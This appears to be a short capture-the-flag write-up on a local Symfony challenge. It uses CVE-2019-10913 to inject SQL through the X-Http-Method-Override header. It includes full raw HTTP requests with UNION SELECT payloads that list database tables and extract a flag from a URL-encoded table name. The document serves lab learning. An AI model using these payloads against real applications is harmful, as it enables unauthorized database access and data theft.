PART 1

you need to see the logs requests on the symfony console to spot a strange endpoint

PART 2

You spot the symfony version

CVE-2019-10913 --> XSS because of logs (bad sanitization detailed on the cve based on an HTTPFoundation class) after what exploit an insert sqli

https://symfony.com/blog/cve-2019-10913-reject-invalid-http-method-overrides

POST

X-Http-Method-Override: ' OR 1=1 #
Get all the tables

POST /e48e13207341b6bffb7fb1622282247b HTTP/1.1
Host: localhost.:5005
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-Http-Method-Override: x'+or+1%3d1+or+'x'%3d'y'+UNION+SELECT+table_schema,table_name,3+FROM+information_schema.tables+WHERE+table_schema+!%3d+"information_schema"%3b%23

There is still a little problem, the table name is case sensitive :)
We can url encode the name of the table so the case wont be a problem :D


POST /e48e13207341b6bffb7fb1622282247b HTTP/1.1
Host: localhost.:5005
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-Http-Method-Override: x'+or+1%3d1+UNION+SELECT+1,2,flag+FROM+%69%74%5f%73%65%65%6d%73%5f%73%65%63%72%65%74%23
Cookie: PHPSESSID=f5fe9385cfa55e039af75f8eadb3a2da
Upgrade-Insecure-Requests: 1
